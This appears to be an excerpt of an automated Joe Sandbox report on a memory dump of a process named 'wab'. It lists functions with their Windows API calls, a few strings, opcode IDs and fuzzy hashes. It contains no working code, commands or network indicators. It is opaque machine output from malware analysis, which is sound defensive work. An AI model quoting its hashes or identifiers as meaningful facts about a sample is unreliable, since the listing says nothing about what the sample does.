                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@mallocmemcpy
                                                              • String ID:
                                                              • API String ID: 3831604043-0
                                                              • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                              • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                              Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                              Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$ChangeCloseCreateFindNotificationTime
                                                              • String ID:
                                                              • API String ID: 1631957507-0
                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                              Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                              • String ID:
                                                              • API String ID: 1125800050-0
                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                              Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                              • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                              Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: BINARY
                                                              • API String ID: 2221118986-907554435
                                                              • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                              • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                              Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                              • String ID:
                                                              • API String ID: 1161345128-0
                                                              • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                              • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                              Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /stext
                                                              • API String ID: 2081463915-3817206916
                                                              • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                              • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                              Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                              • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                              • String ID:
                                                              • API String ID: 159017214-0
                                                              • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                              • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                              Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: malloc
                                                              • String ID: failed to allocate %u bytes of memory
                                                              • API String ID: 2803490479-1168259600
                                                              • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                              • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                              • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                              • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                              Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                              Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcmpmemset
                                                              • String ID:
                                                              • API String ID: 1065087418-0
                                                              • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                              • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                              Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                              • String ID:
                                                              • API String ID: 1481295809-0
                                                              • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                              • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                              Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3150196962-0
                                                              • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                              • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                              Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$PointerRead
                                                              • String ID:
                                                              • API String ID: 3154509469-0
                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                              Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                              • String ID:
                                                              • API String ID: 4232544981-0
                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                              Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                              Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$FileModuleName
                                                              • String ID:
                                                              • API String ID: 3859505661-0
                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                              Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                              Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                              Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                              • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                              Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                              • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                              Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                              Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
